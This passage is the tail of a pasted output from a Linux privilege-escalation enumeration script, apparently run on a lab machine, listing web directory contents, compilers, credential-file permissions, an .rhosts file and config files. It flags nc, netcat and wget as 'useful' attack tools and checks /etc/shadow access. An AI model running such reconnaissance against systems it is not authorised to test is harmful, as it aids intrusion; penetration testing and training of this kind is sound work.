  3071. deflate_module (shared)
  3072. dir_module (shared)
  3073. env_module (shared)
  3074. filter_module (shared)
  3075. mime_module (shared)
  3076. mpm_event_module (shared)
  3077. negotiation_module (shared)
  3078. reqtimeout_module (shared)
  3079. setenvif_module (shared)
  3080. status_module (shared)
  3081.  
  3082.  
  3083. Anything in the Apache home dirs?:
  3084. /var/www/:
  3085. total 12K
  3086. drwxr-xr-x 3 root root 4.0K Aug 22 13:21 .
  3087. drwxr-xr-x 12 root root 4.0K Aug 22 13:21 ..
  3088. drwxr-xr-x 4 root root 4.0K Dec 23 18:16 html
  3089.  
  3090. /var/www/html:
  3091. total 68K
  3092. drwxr-xr-x 4 root root 4.0K Dec 23 18:16 .
  3093. drwxr-xr-x 3 root root 4.0K Aug 22 13:21 ..
  3094. -rw-r--r-- 1 root root 7.1K Dec 23 18:16 about.html
  3095. drwxr-xr-x 6 root root 4.0K Jul 18 14:07 assets
  3096. drwxr-xr-x 2 root root 4.0K Jul 18 14:07 images
  3097. -rw-r--r-- 1 root root 7.6K Dec 23 18:16 index.html
  3098. -rw-r--r-- 1 root root 17K Jul 18 14:07 LICENSE.txt
  3099. -rw-r--r-- 1 root root 963 Jul 18 14:07 README.txt
  3100. -rw-r--r-- 1 root root 8.3K Dec 23 18:16 services.html
  3101.  
  3102. /var/www/html/assets:
  3103. total 24K
  3104. drwxr-xr-x 6 root root 4.0K Jul 18 14:07 .
  3105. drwxr-xr-x 4 root root 4.0K Dec 23 18:16 ..
  3106. drwxr-xr-x 3 root root 4.0K Jul 18 14:07 css
  3107. drwxr-xr-x 2 root root 4.0K Jul 18 14:07 fonts
  3108. drwxr-xr-x 3 root root 4.0K Jul 18 14:07 js
  3109. drwxr-xr-x 6 root root 4.0K Jul 18 14:07 sass
  3110.  
  3111. /var/www/html/assets/css:
  3112. total 124K
  3113. drwxr-xr-x 3 root root 4.0K Jul 18 14:07 .
  3114. drwxr-xr-x 6 root root 4.0K Jul 18 14:07 ..
  3115. -rw-r--r-- 1 root root 29K Jul 18 14:07 font-awesome.min.css
  3116. -rw-r--r-- 1 root root 2.5K Jul 18 14:07 ie8.css
  3117. -rw-r--r-- 1 root root 1.3K Jul 18 14:07 ie9.css
  3118. drwxr-xr-x 2 root root 4.0K Jul 18 14:07 images
  3119. -rw-r--r-- 1 root root 71K Jul 18 14:07 main.css
  3120.  
  3121. /var/www/html/assets/css/images:
  3122. total 12K
  3123. drwxr-xr-x 2 root root 4.0K Jul 18 14:07 .
  3124. drwxr-xr-x 3 root root 4.0K Jul 18 14:07 ..
  3125. -rw-r--r-- 1 root root 246 Jul 18 14:07 close.svg
  3126.  
  3127. /var/www/html/assets/fonts:
  3128. total 908K
  3129. drwxr-xr-x 2 root root 4.0K Jul 18 14:07 .
  3130. drwxr-xr-x 6 root root 4.0K Jul 18 14:07 ..
  3131. -rw-r--r-- 1 root root 123K Jul 18 14:07 FontAwesome.otf
  3132. -rw-r--r-- 1 root root 75K Jul 18 14:07 fontawesome-webfont.eot
  3133. -rw-r--r-- 1 root root 383K Jul 18 14:07 fontawesome-webfont.svg
  3134. -rw-r--r-- 1 root root 150K Jul 18 14:07 fontawesome-webfont.ttf
  3135. -rw-r--r-- 1 root root 89K Jul 18 14:07 fontawesome-webfont.woff
  3136. -rw-r--r-- 1 root root 71K Jul 18 14:07 fontawesome-webfont.woff2
  3137.  
  3138. /var/www/html/assets/js:
  3139. total 144K
  3140. drwxr-xr-x 3 root root 4.0K Jul 18 14:07 .
  3141. drwxr-xr-x 6 root root 4.0K Jul 18 14:07 ..
  3142. drwxr-xr-x 2 root root 4.0K Jul 18 14:07 ie
  3143. -rw-r--r-- 1 root root 94K Jul 18 14:07 jquery.min.js
  3144. -rw-r--r-- 1 root root 2.3K Jul 18 14:07 jquery.scrollex.min.js
  3145. -rw-r--r-- 1 root root 3.2K Jul 18 14:07 main.js
  3146. -rw-r--r-- 1 root root 8.9K Jul 18 14:07 skel.min.js
  3147. -rw-r--r-- 1 root root 13K Jul 18 14:07 util.js
  3148.  
  3149. /var/www/html/assets/js/ie:
  3150. total 68K
  3151. drwxr-xr-x 2 root root 4.0K Jul 18 14:07 .
  3152. drwxr-xr-x 3 root root 4.0K Jul 18 14:07 ..
  3153. -rw-r--r-- 1 root root 3.8K Jul 18 14:07 backgroundsize.min.htc
  3154. -rw-r--r-- 1 root root 2.4K Jul 18 14:07 html5shiv.js
  3155. -rw-r--r-- 1 root root 41K Jul 18 14:07 PIE.htc
  3156. -rw-r--r-- 1 root root 4.5K Jul 18 14:07 respond.min.js
  3157.  
  3158. /var/www/html/assets/sass:
  3159. total 36K
  3160. drwxr-xr-x 6 root root 4.0K Jul 18 14:07 .
  3161. drwxr-xr-x 6 root root 4.0K Jul 18 14:07 ..
  3162. drwxr-xr-x 2 root root 4.0K Jul 18 14:07 base
  3163. drwxr-xr-x 2 root root 4.0K Jul 18 14:07 components
  3164. -rw-r--r-- 1 root root 2.8K Jul 18 14:07 ie8.scss
  3165. -rw-r--r-- 1 root root 1.6K Jul 18 14:07 ie9.scss
  3166. drwxr-xr-x 2 root root 4.0K Jul 18 14:07 layout
  3167. drwxr-xr-x 2 root root 4.0K Jul 18 14:07 libs
  3168. -rw-r--r-- 1 root root 1.3K Jul 18 14:07 main.scss
  3169.  
  3170. /var/www/html/assets/sass/base:
  3171. total 16K
  3172. drwxr-xr-x 2 root root 4.0K Jul 18 14:07 .
  3173. drwxr-xr-x 6 root root 4.0K Jul 18 14:07 ..
  3174. -rw-r--r-- 1 root root 1.2K Jul 18 14:07 _page.scss
  3175. -rw-r--r-- 1 root root 4.0K Jul 18 14:07 _typography.scss
  3176.  
  3177. /var/www/html/assets/sass/components:
  3178. total 48K
  3179. drwxr-xr-x 2 root root 4.0K Jul 18 14:07 .
  3180. drwxr-xr-x 6 root root 4.0K Jul 18 14:07 ..
  3181. -rw-r--r-- 1 root root 517 Jul 18 14:07 _box.scss
  3182. -rw-r--r-- 1 root root 1.8K Jul 18 14:07 _button.scss
  3183. -rw-r--r-- 1 root root 1.9K Jul 18 14:07 _features.scss
  3184. -rw-r--r-- 1 root root 3.8K Jul 18 14:07 _form.scss
  3185. -rw-r--r-- 1 root root 288 Jul 18 14:07 _icon.scss
  3186. -rw-r--r-- 1 root root 889 Jul 18 14:07 _image.scss
  3187. -rw-r--r-- 1 root root 4.8K Jul 18 14:07 _list.scss
  3188. -rw-r--r-- 1 root root 249 Jul 18 14:07 _section.scss
  3189. -rw-r--r-- 1 root root 1.3K Jul 18 14:07 _table.scss
  3190.  
  3191. /var/www/html/assets/sass/layout:
  3192. total 32K
  3193. drwxr-xr-x 2 root root 4.0K Jul 18 14:07 .
  3194. drwxr-xr-x 6 root root 4.0K Jul 18 14:07 ..
  3195. -rw-r--r-- 1 root root 3.2K Jul 18 14:07 _banner.scss
  3196. -rw-r--r-- 1 root root 2.9K Jul 18 14:07 _footer.scss
  3197. -rw-r--r-- 1 root root 2.7K Jul 18 14:07 _header.scss
  3198. -rw-r--r-- 1 root root 2.8K Jul 18 14:07 _menu.scss
  3199. -rw-r--r-- 1 root root 6.2K Jul 18 14:07 _wrapper.scss
  3200.  
  3201. /var/www/html/assets/sass/libs:
  3202. total 48K
  3203. drwxr-xr-x 2 root root 4.0K Jul 18 14:07 .
  3204. drwxr-xr-x 6 root root 4.0K Jul 18 14:07 ..
  3205. -rw-r--r-- 1 root root 787 Jul 18 14:07 _functions.scss
  3206. -rw-r--r-- 1 root root 9.2K Jul 18 14:07 _mixins.scss
  3207. -rw-r--r-- 1 root root 17K Jul 18 14:07 _skel.scss
  3208. -rw-r--r-- 1 root root 1.1K Jul 18 14:07 _vars.scss
  3209.  
  3210. /var/www/html/images:
  3211. total 784K
  3212. drwxr-xr-x 2 root root 4.0K Jul 18 14:07 .
  3213. drwxr-xr-x 4 root root 4.0K Dec 23 18:16 ..
  3214. -rw-r--r-- 1 root root 11K Jul 18 14:27 bg.jpg
  3215. -rw-r--r-- 1 root root 14K Jul 18 14:52 pic01.jpg
  3216. -rw-r--r-- 1 root root 330K Jul 18 14:55 pic02.jpg
  3217. -rw-r--r-- 1 root root 7.6K Jul 18 15:10 pic03.jpg
  3218. -rw-r--r-- 1 root root 116K Jul 18 16:34 pic04.jpg
  3219. -rw-r--r-- 1 root root 57K Jul 18 16:32 pic05.jpg
  3220. -rw-r--r-- 1 root root 183K Jul 18 16:42 pic06.jpg
  3221. -rw-r--r-- 1 root root 33K Jul 18 16:44 pic07.jpg
  3222. -rw-r--r-- 1 root root 9.9K Jul 18 14:07 pic08.jpg
  3223.  
  3224.  
  3225. ### INTERESTING FILES ####################################
  3226. Useful file locations:
  3227. /bin/nc
  3228. /bin/netcat
  3229. /usr/bin/wget
  3230.  
  3231.  
  3232. Installed compilers:
  3233. ii libllvm3.9:i386 1:3.9.1-9 i386 Modular compiler and toolchain technologies, runtime library
  3234. ii libxkbcommon0:i386 0.7.1-1 i386 library interface to the XKB compiler - shared library
  3235.  
  3236.  
  3237. Can we read/write sensitive files:
  3238. -rw-r--r-- 1 root root 2107 Aug 22 13:52 /etc/passwd
  3239. -rw-r--r-- 1 root root 909 Aug 22 11:37 /etc/group
  3240. -rw-r--r-- 1 root root 767 Mar 4 2016 /etc/profile
  3241. -rw-r----- 1 root shadow 1375 Aug 22 11:39 /etc/shadow
  3242.  
  3243.  
  3244. rhost config file(s) and file contents:
  3245. -rw------- 1 root root 0 Aug 22 13:41 /home/mindy/.rhosts
  3246.  
  3247.  
  3248. Can't search *.conf files as no keyword was entered
  3249.  
  3250. Can't search *.log files as no keyword was entered
  3251.  
  3252. Can't search *.ini files as no keyword was entered
  3253.  
  3254. All *.conf files in /etc (recursive 1 level):
  3255. -rw-r--r-- 1 root root 973 Jan 31 2017 /etc/mke2fs.conf
  3256. -rw-r--r-- 1 root root 1018 Jan 23 2017 /etc/usb_modeswitch.conf
  3257. -rw-r--r-- 1 root root 1260 Mar 16 2016 /etc/ucf.conf
  3258. -rw-r--r-- 1 root root 2683 Nov 22 2016 /etc/sysctl.conf
  3259. -rw-r--r-- 1 root root 191 Apr 12 2017 /etc/libaudit.conf
  3260. -rw-r--r-- 1 root root 1343 Jan 9 2007 /etc/wodim.conf
  3261. -rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf
  3262. -rw-r--r-- 1 root root 769 Jan 22 2017 /etc/appstream.conf
  3263. -rw-r--r-- 1 root root 3173 May 29 2017 /etc/reportbug.conf
  3264. -rw-r--r-- 1 root root 2584 Aug 1 2016 /etc/gai.conf
  3265. -rw-r--r-- 1 root root 552 May 27 2017 /etc/pam.conf
  3266. -rw-r--r-- 1 root root 4781 Jan 24 2017 /etc/hdparm.conf
  3267. -rw-r--r-- 1 root root 2969 May 21 2017 /etc/debconf.conf
  3268. -rw-r--r-- 1 root root 540 Jun 18 2017 /etc/nsswitch.conf
  3269. -rw-r--r-- 1 root root 433 Aug 5 2016 /etc/apg.conf
  3270. -rw-r--r-- 1 root root 10368 Apr 5 2017 /etc/sensors3.conf
  3271. -rw-r--r-- 1 root root 26 Oct 30 2016 /etc/libao.conf
  3272. -rw-r--r-- 1 root root 4988 Mar 11 2017 /etc/rygel.conf
  3273. -rw-r--r-- 1 root root 2064 Nov 23 2006 /etc/netscsid.conf
  3274. -rw-r--r-- 1 root root 7649 Jun 18 2017 /etc/pnm2ppa.conf
  3275. -rw-r--r-- 1 root root 1131 Nov 20 2016 /etc/dleyna-server-service.conf
  3276. -rw-r--r-- 1 root root 1963 Jan 18 2017 /etc/rsyslog.conf
  3277. -rw-r--r-- 1 root root 2981 Jun 18 2017 /etc/adduser.conf
  3278. -rw-r--r-- 1 root root 599 May 5 2015 /etc/logrotate.conf
  3279. -rw-r--r-- 1 root root 9 Aug 7 2006 /etc/host.conf
  3280. -rw-r--r-- 1 root root 346 Nov 30 2016 /etc/discover-modprobe.conf
  3281. -rw-r--r-- 1 root root 34 Apr 9 2017 /etc/ld.so.conf
  3282. -rw-r--r-- 1 root root 7431 Jun 18 2017 /etc/ca-certificates.conf
  3283. -rw-r--r-- 1 root root 604 Jun 26 2016 /etc/deluser.conf
  3284. -rw-r--r-- 1 root root 144 Jun 18 2017 /etc/kernel-img.conf
  3285.  
  3286.  
  3287. Current user's history files:
  3288. -rw-r--r-- 1 root root 0 Aug 22 13:41 /home/mindy/.bash_history
  3289.  
  3290.  
  3291. Any interesting mail in /var/mail:
  3292. total 8
  3293. drwxrwsr-x 2 root mail 4096 Jun 18 2017 .
  3294. drwxr-xr-x 12 root root 4096 Aug 22 13:21 ..
  3295.  
  3296.  
  3297. ### SCAN COMPLETE ####################################
Add Comment
Please, Sign In to add comment